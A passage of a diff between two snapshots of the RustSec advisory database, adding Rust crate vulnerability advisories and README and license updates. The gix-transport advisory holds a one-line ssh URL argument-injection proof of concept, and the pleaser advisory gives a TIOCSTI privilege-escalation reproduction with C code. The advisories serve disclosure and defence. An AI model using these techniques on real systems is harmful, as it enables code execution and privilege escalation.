+limitation commercial, advertising or promotional purposes (the
+"License"). The License shall be deemed effective as of the date CC0 was
+applied by Affirmer to the Work. Should any part of the License for any
+reason be judged legally invalid or ineffective under applicable law, such
+partial invalidity or ineffectiveness shall not invalidate the remainder
+of the License, and in such case Affirmer hereby affirms that he or she
+will not (i) exercise any of his or her remaining Copyright and Related
+Rights in the Work or (ii) assert any associated claims and causes of
+action with respect to the Work, in either case contrary to Affirmer's
+express Statement of Purpose.
+
+4. Limitations and Disclaimers.
+
+ a. No trademark or patent rights held by Affirmer are waived, abandoned,
+ surrendered, licensed or otherwise affected by this document.
+ b. Affirmer offers the Work as-is and makes no representations or
+ warranties of any kind concerning the Work, express, implied,
+ statutory or otherwise, including without limitation warranties of
+ title, merchantability, fitness for a particular purpose, non
+ infringement, or the absence of latent or other defects, accuracy, or
+ the present or absence of errors, whether or not discoverable, all to
+ the greatest extent permissible under applicable law.
+ c. Affirmer disclaims responsibility for clearing rights of other persons
+ that may apply to the Work or any use thereof, including without
+ limitation any person's Copyright and Related Rights in the Work.
+ Further, Affirmer disclaims responsibility for obtaining any necessary
+ consents, permissions or other rights required for any use of the
+ Work.
+ d. Affirmer understands and acknowledges that Creative Commons is not a
+ party to this document and has no duty or obligation with respect to
+ this CC0 or use of the Work.
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore' old/advisory-db-20230818/MAINTAINERS_GUIDE.md
new/advisory-db-20231007/MAINTAINERS_GUIDE.md
--- old/advisory-db-20230818/MAINTAINERS_GUIDE.md 2023-08-14
19:14:25.000000000 +0200
+++ new/advisory-db-20231007/MAINTAINERS_GUIDE.md 2023-10-03
15:53:18.000000000 +0200
@@ -6,7 +6,7 @@
This is something first-time submitters may struggle with.
-You can usually make changes directly to the sumbitter's branch. It's a great
way to make CI pass and help out first-timers, but avoid making substantial
changes to content this way without consuling the submitter.
+You can usually make changes directly to the submitter's branch. It's a great
way to make CI pass and help out first-timers, but avoid making substantial
changes to content this way without consulting the submitter.
## Make sure the developers of the crate in question are aware of the issue
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore' old/advisory-db-20230818/README.md
new/advisory-db-20231007/README.md
--- old/advisory-db-20230818/README.md 2023-08-14 19:14:25.000000000 +0200
+++ new/advisory-db-20231007/README.md 2023-10-03 15:53:18.000000000 +0200
@@ -12,7 +12,7 @@
All our data is available on
[osv.dev](https://osv.dev/list?ecosystem=crates.io&q=)
and through their [API](https://osv.dev/#use-the-api).
-[Github Advisory Database](https://github.com/advisories/) imports our
advisories.
+[GitHub Advisory Database](https://github.com/advisories/) imports our
advisories.
The following tools consume this advisory database and can be used for auditing
and reporting (send PRs to add yours):
@@ -29,6 +29,8 @@
To report a new vulnerability, open a pull request using the template below.
See [CONTRIBUTING.md] for more information.
+See [HOWTO_UNMAINTAINED.md] before filing an advisory for an unmaintained
crate.
+
<a href="https://github.com/RustSec/advisory-db/blob/main/CONTRIBUTING.md";>
<img alt="Report Vulnerability" width="250px" height="60px"
src="https://rustsec.org/img/report-vuln-button.svg";>
</a>
@@ -60,13 +62,14 @@
#withdrawn = "YYYY-MM-DD"
# URL to a long-form description of this issue, e.g. a GitHub issue/PR,
-# a change log entry, or a blogpost announcing the release (optional)
+# a change log entry, or a blogpost announcing the release (optional, except
+# for advisories using a license that requires attribution).
url = "https://github.com/mystuff/mycrate/issues/123";
# URL to additional helpful references regarding the advisory (optional)
#references = ["https://github.com/mystuff/mycrate/discussions/1";]
-# Optional: Indicates the type of informational security advisory
+# Optional: Indicates the type of informational security advisory
# - "unsound" for soundness issues
# - "unmaintained" for crates that are no longer maintained
# - "notice" for other informational notices
@@ -91,6 +94,13 @@
# e.g. CVE for a C library wrapped by a -sys crate)
#related = ["CVE-2018-YYYY", "CVE-2018-ZZZZ"]
+# Optional: the advisory license as an SPDX identifier. The default is
"CC0-1.0".
+# Accepted values are "CC0-1.0" and "CC-BY-4.0".
+# When using "CC-BY-4.0", the `url` field must constain the link to the source
+# advisory. This should only be used for advisories imported for the GitHub
+# Advisory database ("GHSA").
+#license = "CC-BY-4.0"
+
# Optional: metadata which narrows the scope of what this advisory affects
[affected]
# CPU architectures impacted by this vulnerability (optional).
@@ -129,9 +139,15 @@
## License
-All content in this repository is placed in the public domain.
+All content in this repository is placed in the public domain, except
otherwise specified.
+
+[](https://github.com/RustSec/advisory-db/blob/main/LICENSES/CC0-1.0.txt)
+
+The exceptions are advisories imported from [GitHub Advisory
Database](https://docs.github.com/en/site-policy/github-terms/github-terms-for-additional-products-and-features#advisory-database),
+placed under CC-BY 4.0 license.
+They contain a `license` field explicitly indicating their license and a `url`
field pointing to the original advisory for proper attribution.
-[](https://github.com/RustSec/advisory-db/blob/main/LICENSE.txt)
+[](https://github.com/RustSec/advisory-db/blob/main/LICENSES/CC-BY-4.0.txt)
[//]: # (badges)
@@ -151,3 +167,4 @@
[trivy]: https://aquasecurity.github.io/trivy/
[dependabot]:
https://docs.github.com/en/code-security/dependabot/dependabot-security-updates/about-dependabot-security-updates
[CONTRIBUTING.md]:
https://github.com/RustSec/advisory-db/blob/main/CONTRIBUTING.md
+[HOWTO_UNMAINTAINED.md]: ./HOWTO_UNMAINTAINED.md
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/ansi_term/RUSTSEC-2021-0139.md
new/advisory-db-20231007/crates/ansi_term/RUSTSEC-2021-0139.md
--- old/advisory-db-20230818/crates/ansi_term/RUSTSEC-2021-0139.md
2023-08-14 19:14:25.000000000 +0200
+++ new/advisory-db-20231007/crates/ansi_term/RUSTSEC-2021-0139.md
2023-10-03 15:53:18.000000000 +0200
@@ -21,6 +21,7 @@
The below list has not been vetted in any way and may or may not contain
alternatives;
+ - [ansiterm](https://crates.io/crates/ansiterm)
- [anstyle](https://github.com/epage/anstyle)
- [console](https://crates.io/crates/console)
- [nu-ansi-term](https://crates.io/crates/nu-ansi-term)
@@ -30,4 +31,4 @@
## Dependency Specific Migration(s)
- - [structopt, clap2](https://github.com/clap-rs/clap/discussions/4172)
\ No newline at end of file
+ - [structopt, clap2](https://github.com/clap-rs/clap/discussions/4172)
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/bcder/RUSTSEC-2023-0062.md
new/advisory-db-20231007/crates/bcder/RUSTSEC-2023-0062.md
--- old/advisory-db-20230818/crates/bcder/RUSTSEC-2023-0062.md 1970-01-01
01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/bcder/RUSTSEC-2023-0062.md 2023-10-03
15:53:18.000000000 +0200
@@ -0,0 +1,26 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0062"
+package = "bcder"
+date = "2023-09-13"
+url = "https://nlnetlabs.nl/downloads/bcder/CVE-2023-39914.txt";
+categories = ["denial-of-service"]
+keywords = ["example", "freeform", "keywords"]
+aliases = ["CVE-2023-39914"]
+cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+references = ["https://github.com/NLnetLabs/bcder/pull/74";]
+
+[versions]
+patched = [">= 0.7.3"]
+```
+
+# BER/CER/DER decoder panics on invalid input
+
+Due to insufficient checking of input data, decoding certain data sequences
+can lead to _bcder_ panicking rather than returning an error. This can affect
+both the actual decoding stage as well as accessing content of types that
+utilized delayed decoding.
+
+bcder 0.7.3 fixes these issues by more thoroughly checking inputs and
+returning errors as expected.
+
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/borsh/RUSTSEC-2023-0033.md
new/advisory-db-20231007/crates/borsh/RUSTSEC-2023-0033.md
--- old/advisory-db-20230818/crates/borsh/RUSTSEC-2023-0033.md 2023-08-14
19:14:25.000000000 +0200
+++ new/advisory-db-20231007/crates/borsh/RUSTSEC-2023-0033.md 2023-10-03
15:53:18.000000000 +0200
@@ -11,7 +11,7 @@
[affected]
[versions]
-patched = []
+patched = [">= 1.0.0-alpha.1"]
```
# Parsing borsh messages with ZST which are not-copy/clone is unsound
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/dlopen_derive/RUSTSEC-2023-0051.md
new/advisory-db-20231007/crates/dlopen_derive/RUSTSEC-2023-0051.md
--- old/advisory-db-20230818/crates/dlopen_derive/RUSTSEC-2023-0051.md
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/dlopen_derive/RUSTSEC-2023-0051.md
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,27 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0051"
+package = "dlopen_derive"
+date = "2023-07-30"
+url = "https://github.com/szymonwieloch/rust-dlopen/issues/47";
+informational = "unmaintained"
+
+[versions]
+patched = []
+```
+
+# `dlopen_derive` is unmaintained
+
+`dlopen_derive` hasn't been updated since June 9, 2019.
+
+`dlopen_derive` depends on [`quote = "0.6.12"`] and [`syn = "0.15.34"`].
Versions `1.0.0` of these dependencies were published on August 13, 2019. The
`0.*` versions haven't received updates since.
+
+Note that `dlopen` is an unmaintained crate from the same repository as
`dlopen_derive`. However, migrating away from `dlopen_derive` implies migrating
away from `dlopen`, as well.
+
+## Recommended alternatives
+
+- [`dlopen2_derive`] (and `dlopen2`)
+
+[`dlopen2_derive`]: https://github.com/OpenByteDev/dlopen2
+[`quote = "0.6.12"`]: https://github.com/dtolnay/quote/releases/tag/0.6.12
+[`syn = "0.15.34"`]: https://github.com/dtolnay/syn/releases/tag/0.15.34
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/ed25519-dalek/RUSTSEC-2022-0093.md
new/advisory-db-20231007/crates/ed25519-dalek/RUSTSEC-2022-0093.md
--- old/advisory-db-20230818/crates/ed25519-dalek/RUSTSEC-2022-0093.md
2023-08-14 19:14:25.000000000 +0200
+++ new/advisory-db-20231007/crates/ed25519-dalek/RUSTSEC-2022-0093.md
2023-10-03 15:53:18.000000000 +0200
@@ -5,6 +5,7 @@
date = "2022-06-11"
categories = ["crypto-failure"]
url = "https://github.com/MystenLabs/ed25519-unsafe-libs";
+aliases = ["GHSA-w5vr-6qhr-36cc"]
[versions]
patched = [">= 2"]
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/gix-transport/RUSTSEC-2023-0064.md
new/advisory-db-20231007/crates/gix-transport/RUSTSEC-2023-0064.md
--- old/advisory-db-20230818/crates/gix-transport/RUSTSEC-2023-0064.md
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/gix-transport/RUSTSEC-2023-0064.md
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,25 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0064"
+package = "gix-transport"
+date = "2023-09-23"
+url = "https://github.com/Byron/gitoxide/pull/1032";
+references = ["https://secure.phabricator.com/T12961";]
+categories = ["code-execution"]
+[versions]
+patched = [">= 0.36.1"]
+```
+
+# gix-transport code execution vulnerability
+
+The `gix-transport` crate prior to the patched version 0.36.1 would allow
attackers to
+use malicious ssh clone URLs to pass arbitrary arguments to the `ssh` program,
leading
+to arbitrary code execution.
+
+PoC: `gix clone 'ssh://-oProxyCommand=open$IFS-aCalculator/foo'`
+
+This will launch a calculator on OSX.
+
+See https://secure.phabricator.com/T12961 for more details on similar
vulnerabilities in `git`.
+
+Thanks for [vin01](https://github.com/vin01) for disclosing the issue.
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/inventory/RUSTSEC-2023-0057.md
new/advisory-db-20231007/crates/inventory/RUSTSEC-2023-0057.md
--- old/advisory-db-20230818/crates/inventory/RUSTSEC-2023-0057.md
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/inventory/RUSTSEC-2023-0057.md
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,26 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0057"
+package = "inventory"
+date = "2023-09-10"
+url = "https://github.com/dtolnay/inventory/pull/43";
+informational = "unsound"
+keywords = ["life-before-main"]
+
+[versions]
+patched = [">= 0.2.0"]
+```
+
+# Fails to prohibit standard library access prior to initialization of Rust
standard library runtime
+
+Affected versions allow arbitrary caller-provided code to execute before the
+lifetime of `main`.
+
+If the caller-provided code accesses particular pieces of the standard library
+that require an initialized Rust runtime, such as `std::io` or `std::thread`,
+these may not behave as documented. Panics are likely; UB is possible.
+
+The flaw was corrected by enforcing that only code written within the
+`inventory` crate, which is guaranteed not to access runtime-dependent parts of
+the standard library, runs before `main`. Caller-provided code is restricted to
+running at compile time.
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/inventory/RUSTSEC-2023-0058.md
new/advisory-db-20231007/crates/inventory/RUSTSEC-2023-0058.md
--- old/advisory-db-20230818/crates/inventory/RUSTSEC-2023-0058.md
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/inventory/RUSTSEC-2023-0058.md
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,25 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0058"
+package = "inventory"
+date = "2023-09-10"
+url = "https://github.com/dtolnay/inventory/pull/42";
+informational = "unsound"
+categories = ["thread-safety"]
+keywords = ["life-before-main"]
+
+[versions]
+patched = [">= 0.2.0"]
+```
+
+# Exposes reference to non-Sync data to an arbitrary thread
+
+Affected versions do not enforce a `Sync` bound on the type of caller-provided
+value held in the plugin registry. References to these values are made
+accessible to arbitrary threads other than the one that constructed them.
+
+A caller could use this flaw to submit thread-unsafe data into inventory, then
+access it as a reference simultaneously from multiple threads.
+
+The flaw was corrected by enforcing that data submitted by the caller into
+inventory is `Sync`.
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/json/RUSTSEC-2022-0081.md
new/advisory-db-20231007/crates/json/RUSTSEC-2022-0081.md
--- old/advisory-db-20230818/crates/json/RUSTSEC-2022-0081.md 2023-08-14
19:14:25.000000000 +0200
+++ new/advisory-db-20231007/crates/json/RUSTSEC-2022-0081.md 2023-10-03
15:53:18.000000000 +0200
@@ -23,6 +23,7 @@
The below list has not been vetted in any way and may or may not contain
alternatives;
+- [jzon](https://crates.io/crates/jzon) maintained fork of json
- [serde_json](https://crates.io/crates/serde_json)
- [json-deserializer](https://crates.io/crates/json-deserializer)
- [simd-json](https://crates.io/crates/simd-json)
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/lexical/RUSTSEC-2023-0055.md
new/advisory-db-20231007/crates/lexical/RUSTSEC-2023-0055.md
--- old/advisory-db-20230818/crates/lexical/RUSTSEC-2023-0055.md
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/lexical/RUSTSEC-2023-0055.md
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,32 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0055"
+package = "lexical"
+date = "2023-09-03"
+informational = "unsound"
+references = ["https://github.com/Alexhuszagh/rust-lexical/issues/102";,
"https://github.com/Alexhuszagh/rust-lexical/issues/101";,
"https://github.com/Alexhuszagh/rust-lexical/issues/95";,
"https://github.com/Alexhuszagh/rust-lexical/issues/104";]
+
+[versions]
+patched = []
+```
+
+# Multiple soundness issues
+
+`lexical` contains multiple soundness issues:
+
+ 1. [Bytes::read() allows creating instances of types with invalid bit
patterns](https://github.com/Alexhuszagh/rust-lexical/issues/102)
+ 1. [BytesIter::read() advances iterators out of
bounds](https://github.com/Alexhuszagh/rust-lexical/issues/101)
+ 1. [The `BytesIter` trait has safety invariants but is public and not marked
`unsafe`](https://github.com/Alexhuszagh/rust-lexical/issues/104)
+ 1. [`write_float()` calls `MaybeUninit::assume_init()` on uninitialized data,
which is is not allowed by the Rust abstract
machine](https://github.com/Alexhuszagh/rust-lexical/issues/95)
+
+The crate also has some correctness issues and appears to be unmaintained.
+
+## Alternatives
+
+For quickly parsing floating-point numbers third-party crates are no longer
needed. A fast float parsing algorith by the author of `lexical` has been
[merged](https://github.com/rust-lang/rust/pull/86761) into libcore.
+
+For quickly parsing integers, consider `atoi` and `btoi` crates (100% safe
code). `atoi_radix10` provides even faster parsing, but only with `-C
target-cpu=native`, and at the cost of some `unsafe`.
+
+For formatting integers in a `#[no_std]` context consider the
[`numtoa`](https://crates.io/crates/numtoa) crate.
+
+For working with big numbers consider `num-bigint` and `num-traits`.
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/libwebp-sys/RUSTSEC-2023-0061.md
new/advisory-db-20231007/crates/libwebp-sys/RUSTSEC-2023-0061.md
--- old/advisory-db-20230818/crates/libwebp-sys/RUSTSEC-2023-0061.md
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/libwebp-sys/RUSTSEC-2023-0061.md
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,18 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0061"
+package = "libwebp-sys"
+date = "2023-09-12"
+categories = ["memory-corruption"]
+keywords = ["webp"]
+aliases = ["CVE-2023-5129", "CVE-2023-4863"]
+
+[versions]
+patched = [">= 0.9.3"]
+```
+
+# libwebp: OOB write in BuildHuffmanTable
+
+[Google](https://chromereleases.googleblog.com/2023/09/stable-channel-update-for-desktop_11.html)
and [Mozilla](https://www.mozilla.org/en-US/security/advisories/mfsa2023-40/)
have released security advisories for RCE due to heap overflow in libwebp.
Google warns the vulnerability has been exploited in the wild.
+
+libwebp needs to be updated to 1.3.2 to include a patch for "OOB write in
BuildHuffmanTable".
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/libwebp-sys2/RUSTSEC-2023-0060.md
new/advisory-db-20231007/crates/libwebp-sys2/RUSTSEC-2023-0060.md
--- old/advisory-db-20230818/crates/libwebp-sys2/RUSTSEC-2023-0060.md
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/libwebp-sys2/RUSTSEC-2023-0060.md
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,18 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0060"
+package = "libwebp-sys2"
+date = "2023-09-12"
+categories = ["memory-corruption"]
+keywords = ["webp"]
+aliases = ["CVE-2023-5129", "CVE-2023-4863"]
+
+[versions]
+patched = [">= 0.1.8"]
+```
+
+# libwebp: OOB write in BuildHuffmanTable
+
+[Google](https://chromereleases.googleblog.com/2023/09/stable-channel-update-for-desktop_11.html)
and [Mozilla](https://www.mozilla.org/en-US/security/advisories/mfsa2023-40/)
have released security advisories for RCE due to heap overflow in libwebp.
Google warns the vulnerability has been exploited in the wild.
+
+libwebp needs to be updated to 1.3.2 to include a patch for "OOB write in
BuildHuffmanTable".
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/mail-internals/RUSTSEC-2023-0054.md
new/advisory-db-20231007/crates/mail-internals/RUSTSEC-2023-0054.md
--- old/advisory-db-20230818/crates/mail-internals/RUSTSEC-2023-0054.md
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/mail-internals/RUSTSEC-2023-0054.md
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,24 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0054"
+package = "mail-internals"
+date = "2023-08-07"
+url =
"https://git.sr.ht/~nabijaczleweli/mail-internals.crate/commit/05443c864b204e7f1512caf2d53e8cce4dd340fc";
+categories = ["memory-corruption"]
+keywords = ["mail", "mail-api"]
+aliases = ["GHSA-rcx8-48pc-v9q8"]
+
+[affected]
+functions = { "mail_internals::utils::vec_insert_bytes" = [">= 0.2.0"] }
+
+[versions]
+patched = []
+```
+
+# Use-after-free in `vec_insert_bytes`
+Incorrect reallocation logic in the function
[`vec_insert_bytes`](https://docs.rs/mail-internals/0.2.3/mail_internals/utils/fn.vec_insert_bytes.html)
causes a use-after-free.
+
+This function does not have to be called directly to trigger the vulnerability
because many methods on
[`EncodingWriter`](https://docs.rs/mail-internals/0.2.3/mail_internals/encoder/struct.EncodingWriter.html)
call this function internally.
+
+The mail-\* suite is unmaintained and the upstream sources have been actively
vandalised.
+A fixed `mail-internals-ng` (and `mail-headers-ng` and `mail-core-ng`) crate
has been published which fixes this, and a dependency on another unsound crate.
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/multipart/RUSTSEC-2023-0050.md
new/advisory-db-20231007/crates/multipart/RUSTSEC-2023-0050.md
--- old/advisory-db-20230818/crates/multipart/RUSTSEC-2023-0050.md
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/multipart/RUSTSEC-2023-0050.md
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,20 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0050"
+package = "multipart"
+date = "2023-04-11"
+informational = "unmaintained"
+
+[versions]
+patched = []
+```
+
+# multipart is Unmaintained
+
+The `multipart` crate is unmaintained. The author has archived the github
+repository.
+
+Alternatives:
+
+- [multer](https://crates.io/crates/multer)
+- [multiparty](https://crates.io/crates/multiparty)
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/pleaser/RUSTSEC-2023-0066.md
new/advisory-db-20231007/crates/pleaser/RUSTSEC-2023-0066.md
--- old/advisory-db-20230818/crates/pleaser/RUSTSEC-2023-0066.md
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/pleaser/RUSTSEC-2023-0066.md
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,49 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0066"
+package = "pleaser"
+date = "2023-04-29"
+url = "https://gitlab.com/edneville/please/-/issues/13";
+categories = ["privilege-escalation"]
+keywords = []
+cvss = "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+
+[versions]
+patched = []
+
+[affected]
+```
+
+# Vulnerable to privilege escalation using ioctls TIOCSTI and TIOCLINUX
+
+please is vulnerable to privilege escalation using ioctls TIOCSTI
+and TIOCLINUX on systems where they are not disabled.
+
+Here is how to see it in action:
+
+```
+$ cd "$(mktemp -d)"
+$ git clone --depth 1 https://gitlab.com/edneville/please.git
+$ cd please/
+$ git rev-parse HEAD # f3598f8fae5455a8ecf22afca19eaba7be5053c9
+$ cargo test && cargo build --release
+$ echo
"[${USER}_as_nobody]"$'\nname='"${USER}"$'\ntarget=nobody\nrule=.*\nrequire_pass=false'
| sudo tee /etc/please.ini
+$ sudo chown root:root ./target/release/please
+$ sudo chmod u+s ./target/release/please
+$ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c
+#include <sys/ioctl.h>
+
+int main(void) {
+ const char *text = "id\n";
+ while (*text)
+ ioctl(0, TIOCSTI, text++);
+ return 0;
+}
+TIOCSTI_C_EOF
+$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
+$ ./target/release/please -u nobody /tmp/TIOCSTI # runs id(1) as ${USER}
rather than nobody
+```
+
+Please note that:
+
+This affects both the case where root wants to drop privileges as well when
non-root wants to gain other privileges.
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/quinn-proto/RUSTSEC-2023-0063.md
new/advisory-db-20231007/crates/quinn-proto/RUSTSEC-2023-0063.md
--- old/advisory-db-20230818/crates/quinn-proto/RUSTSEC-2023-0063.md
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/quinn-proto/RUSTSEC-2023-0063.md
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,21 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0063"
+package = "quinn-proto"
+date = "2023-09-21"
+url = "https://github.com/quinn-rs/quinn/pull/1667";
+categories = ["denial-of-service"]
+keywords = ["panic"]
+aliases = ["GHSA-q8wc-j5m9-27w3"]
+cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+
+[versions]
+patched = ["^0.9.5", ">= 0.10.5"]
+```
+
+# Denial of service in Quinn servers
+
+Receiving QUIC frames containing a frame with unknown frame type could lead to
a panic.
+Unfortunately this is issue was not found by our fuzzing infrastructure.
+
+Thanks to the QUIC Tester research group for reporting this issue.
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/rustdecimal/RUSTSEC-2022-0042.md
new/advisory-db-20231007/crates/rustdecimal/RUSTSEC-2022-0042.md
--- old/advisory-db-20230818/crates/rustdecimal/RUSTSEC-2022-0042.md
2023-08-14 19:14:25.000000000 +0200
+++ new/advisory-db-20231007/crates/rustdecimal/RUSTSEC-2022-0042.md
2023-10-03 15:53:18.000000000 +0200
@@ -6,7 +6,7 @@
url =
"https://groups.google.com/g/rustlang-security-announcements/c/5DVtC8pgJLw?pli=1";
categories = ["code-execution"]
keywords = ["typosquatting"]
-aliases = ["GHSA-7pwq-f4pq-78gm"]
+aliases = ["GHSA-7pwq-f4pq-78gm", "MAL-2022-1"]
[versions]
patched = []
```
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/rustls-webpki/RUSTSEC-2023-0053.md
new/advisory-db-20231007/crates/rustls-webpki/RUSTSEC-2023-0053.md
--- old/advisory-db-20230818/crates/rustls-webpki/RUSTSEC-2023-0053.md
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/rustls-webpki/RUSTSEC-2023-0053.md
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,31 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0053"
+package = "rustls-webpki"
+date = "2023-08-22"
+categories = ["denial-of-service"]
+keywords = ["certificate", "path building", "x509"]
+cvss = "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+related = ["CVE-2018-16875"]
+aliases = ["GHSA-fh2r-99q2-6mmg"]
+
+[versions]
+patched = [">= 0.100.2, < 0.101.0", ">= 0.101.4"]
+```
+
+# rustls-webpki: CPU denial of service in certificate path building
+
+When this crate is given a pathological certificate chain to validate, it will
+spend CPU time exponential with the number of candidate certificates at each
+step of path building.
+
+Both TLS clients and TLS servers that accept client certificate are affected.
+
+We now give each path building operation a budget of 100 signature
verifications.
+
+The original `webpki` crate is also affected.
+
+This was previously reported in the original crate
+<https://github.com/briansmith/webpki/issues/69> and re-reported to us
+recently by Luke Malinowski.
+
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/tungstenite/RUSTSEC-2023-0065.md
new/advisory-db-20231007/crates/tungstenite/RUSTSEC-2023-0065.md
--- old/advisory-db-20230818/crates/tungstenite/RUSTSEC-2023-0065.md
1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/crates/tungstenite/RUSTSEC-2023-0065.md
2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,21 @@
+```toml
+[advisory]
+id = "RUSTSEC-2023-0065"
+package = "tungstenite"
+date = "2023-09-25"
+url = "https://github.com/snapview/tungstenite-rs/issues/376";
+categories = ["denial-of-service"]
+aliases = ["CVE-2023-43669", "GHSA-9mcr-873m-xcxp"]
+cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+
+[versions]
+patched = [">= 0.20.1"]
+```
+
+# Tungstenite allows remote attackers to cause a denial of service
+
+The Tungstenite crate through 0.20.0 for Rust allows remote attackers to cause
+a denial of service (minutes of CPU consumption) via an excessive length of an
+HTTP header in a client handshake. The length affects both how many times a
parse
+is attempted (e.g., thousands of times) and the average amount of data for each
+parse attempt (e.g., millions of bytes).
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/users/RUSTSEC-2023-0040.md
new/advisory-db-20231007/crates/users/RUSTSEC-2023-0040.md
--- old/advisory-db-20230818/crates/users/RUSTSEC-2023-0040.md 2023-08-14
19:14:25.000000000 +0200
+++ new/advisory-db-20231007/crates/users/RUSTSEC-2023-0040.md 2023-10-03
15:53:18.000000000 +0200
@@ -15,7 +15,9 @@
The `users` crate hasn't seen any action since 2020-10-08. The developer seems
[MIA] since.
## Recommended alternatives
+- [`uzers`]
- [`sysinfo`]
[MIA]: https://github.com/ogham/rust-users/issues/54
+[`uzers`]: https://crates.io/crates/uzers
[`sysinfo`]: https://crates.io/crates/sysinfo
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/crates/users/RUSTSEC-2023-0059.md
new/advisory-db-20231007/crates/users/RUSTSEC-2023-0059.md
--- old/advisory-db-20230818/crates/users/RUSTSEC-2023-0059.md 1970-01-01
